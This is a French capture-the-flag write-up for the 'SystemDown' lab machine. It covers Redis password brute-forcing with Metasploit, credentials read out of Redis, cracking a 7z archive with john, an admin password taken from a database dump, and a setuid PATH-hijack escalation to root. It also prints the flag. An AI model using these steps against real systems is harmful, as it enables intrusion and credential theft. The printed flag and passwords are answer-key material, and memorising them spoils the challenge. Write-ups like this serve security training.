# WRITEUP WARGAME / SYSTEMDOWN
## Consigne:

```
L’équipe IT de *SystemDown* a mis en place un serveur de partage de documents. 
Vous devez trouver le moyen de devenir *root* sur la machine.

Le flag se trouve dans le fichier `/root/root.txt`

Démarrer un environnement virtuel. Attention, la durée de vie de l'environnement est limitée.

<div>
<button class="btn btn-info" onclick="window.open('/portailvms/7','_blank')" >Accéder au portail</button>
</div>
<p></p>

`3136150cce6cbddc3309970ae05bfe4da73c3557` [rockyou.zip](https://download.marshack.fr/4e9ac9a3fa185a08d21662cde2a07bd1a8803728/rockyou.zip)

> Format du flag : fl@g{...}
```

## Pièce(s) jointe(s) :

```
rockyou.zip
```

## Serveur :

```
PortailVMS
```

## Points attribués :

```
50
```

## Hint : 

```
néant
```

## Flag :

```
fl@g{344ad82a0ecfc1bafe917144dbfe3b19154bfb63880cc9f3e69eabbc5b95433f}
```

## Solution : 

Pour commencer, il faut faire un nmap afin de voir les ports ouverts sur la machine (remplacer l'adresse IP par celle allouée par le PortailVMS) :
```bash
nmap -sVC 172.102.100.200 -p1-65500
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-01 12:46 CET
Nmap scan report for 172.102.100.200
Host is up (0.00044s latency).
Not shown: 65497 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
443/tcp  open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=qsdfgjklm.esdown.local/organizationName=ESDOWN/stateOrProvinceName=Normandie/countryName=FR
| Not valid before: 2022-07-20T21:33:24
|_Not valid after:  2023-07-20T21:33:24
| tls-alpn: 
|   h2
|_  http/1.1
| tls-nextprotoneg: 
|   h2
|_  http/1.1
6379/tcp open  redis    Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.36 seconds
```

Nous remarquons que le port 6379 est exposé. Il s’agit d’un serveur *redis*. Il faut donc essayer de se connecter sur ce service. Pour cela, il faut installer le paquet redis-tools (`sudo apt install redis-tools`).

```
redis-cli -h 172.102.100.200
```

Maintenant nous allons lister les clés enregistrées dans redis. Nous remarquons qu’il y a une authentification :
```
172.102.100.200:6379> KEYS *
(error) NOAUTH Authentication required.
```

Il faut brute-forcer l’authentification avec metasploit :
```
msfconsole
msf5 > use scanner/redis/redis_login
msf5 auxiliary(scanner/redis/redis_login) > set RHOSTS 172.102.100.200
msf5 auxiliary(scanner/redis/redis_login) > options 
```

Pour brute-forcer l’authentification redis, nous allons utiliser le fichier *rockyou.txt* et paramétrer le scanner de la façon suivante :

```
Module options (auxiliary/scanner/redis/redis_login) :

   Name              Current Setting                                                    Required  Description
   ----              ---------------                                                    --------  -----------
   BLANK_PASSWORDS   false                                                              no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                  yes       How fast to bruteforce, from 0 to 5
   DB_ALL_PASS       false                                                              no        Add all passwords in the current database to the list
   PASSWORD          foobared                                                           no        Redis password for authentication test
   PASS_FILE         /usr/share/seclists/Passwords/rockyou.txt                          no        The file that contains a list of of probable passwords.
   RHOSTS            172.102.100.200                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             6379                                                               yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                                              yes       Stop guessing when a credential works for a host
   THREADS           1                                                                  yes       The number of concurrent threads (max one per host)
   VERBOSE           true                                                               yes       Whether to print output for all attempts

```

Puis lancer la commande `exploit` pour lancer le brute-force :

```
msf5 auxiliary(scanner/redis/redis_login) > exploit

[-] 172.102.100.200:6379       - 172.102.100.200:6379       - LOGIN FAILED: redis:jasmine (Incorrect: -WRONGPASS invalid username-password pair)
[+] 172.102.100.200:6379       - 172.102.100.200:6379       - Login Successful: redis:brandon (Successful: +OK)
```

Nous pouvons maintenant nous connecter au redis et lister les clés :

```
redis-cli -h 172.102.100.200
172.102.100.200:6379> auth brandon
OK
172.102.100.200:6379> keys *
1) "key_web_url"
2) "key_patrice_password"
3) "key_user_web_value"
```

Nous pouvons afficher la valeur des clés (*https://www.esdown.local*, *patrice*, *T7#G9Ls4d5@#S!b$K2h6fg*).

```
172.102.100.200:6379> get key_web_url
"https://www.esdown.local"
172.102.100.200:6379> get key_patrice_password
"T7#G9Ls4d5@#S!b$K2h6fg"
172.102.100.200:6379> get key_user_web_value
"patrice"
```

On renseigne le fichier */etc/hosts*, avec le hostname et l'adresse IP qui nous est allouée :

172.102.100.200      esdown.local www.esdown.local



On se connecte sur l'interface web https://www.esdown.local, et on s'authentifie.

Dans l’interface web, nous trouvons deux fichiers. Nous allons ouvrir le fichier *recap.md* :

```
22/05/2022 :

- MAJ OK 
- Penser à remettre le hash du compte admin dans la base de données KO
```

Nous allons télécharger également le fichier nextcloud.7z et essayer de l’ouvrir. Ce fichier contient une copie de la base de données et est protégé par un mot de passe.

Il faut utiliser le programme **7z2john** pour récupérer le hash du mot de passe du fichier *nextcloud.7z*. 

Pré-requis  :
```bash
sudo apt install libcompress-raw-lzma-perl
```
Nous allons maintenant extraire le hash vers le fichier *hash.txt* :

```bash
/usr/share/john/7z2john.pl nextcloud.7z > hash.txt
```

Maintenant il faut utiliser le programme *john* :

```bash
sudo john hash.txt --wordlist=/usr/share/seclists/Passwords/rockyou.txt
Press 'q' or Ctrl-C to abort, almost any other key for status
liverpool        (nextcloud.7z)
1g 0:00:00:05 DONE (2023-02-01 13:40) 0.1915g/s 7.662p/s 7.662c/s 7.662C/s purple..123123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```


Et voilà le mot de passe du fichier : **liverpool**

Nous pouvons donc extraire l’archive avec le mot de passe trouvé.

Après extraction, nous récupérons un fichier *nextcloud.sql*, il s’agit surement d’un dump de la base de données de l’application web. Nous allons l’ouvrir avec un éditeur de texte, et rechercher le contenu de la table *oc_users*.

Comme mentionné dans le fichier « recap.md » le mot de passe du compte administrateur est en clair. Voici son mdp : *29NM53zua9xxJ9LX*

Une fois connecté, nous pouvons télécharger un nouveau fichier *notes.md* qui contient les informations de connexion vers une nouvelle application web (*https://qsdfgjklm.esdown.local*).


On met à jour le fichier */etc/hosts* :
```
172.102.100.200 esdown.local www.esdown.local qsdfgjklm.esdown.local
```

Maintenant nous allons nous connecter sur la nouvelle URL découverte. Une fois connecté, nous allons nous rendre dans le menu **Terminal**. La commande `id` nous affiche que nous sommes connecté en tant qu'utilisateur *administrateur*.

Maintenant, nous allons vérifier tous les programmes ayant un setuid :
```bash
find / -type f -perm /6000 -ls 2>/dev/null
```

Un programme "non habituel" retient notre attention : `/opt/auto-update`

Le code source du programme est présent : `/opt/auto-update.c`

Visiblement le programme est vulnérable à une injection dans la variable d’environnement $PATH.

Nous allons créer un répertoire dans /tmp. Dans ce répertoire, nous allons placer un fichier `apt` qui va contenir `/bin/bash` :
```bash
mkdir /tmp/foo
echo "/bin/bash" > /tmp/foo/apt
chmod 755 /tmp/foo/apt
```

Maintenant il faut modifier la variable d’environnement afin que lorsque le programme *auto-update* appelle le programme *apt*, notre programme s’exécute plutôt que le programme */usr/bin/apt* :

```bash
export PATH=/tmp/foo/:$PATH

./auto-update
id
uid=0(root) gid=1001(administrateur) groups=1001(administrateur)
```

Nous sommes **root** :-)

Le flag est dans le fichier */root/root.txt* (écrit dans la consigne) :
```bash
cat /root/root.txt
fl@g{344ad82a0ecfc1bafe917144dbfe3b19154bfb63880cc9f3e69eabbc5b95433f}
```

<!-- Review Taz : 20230322 -->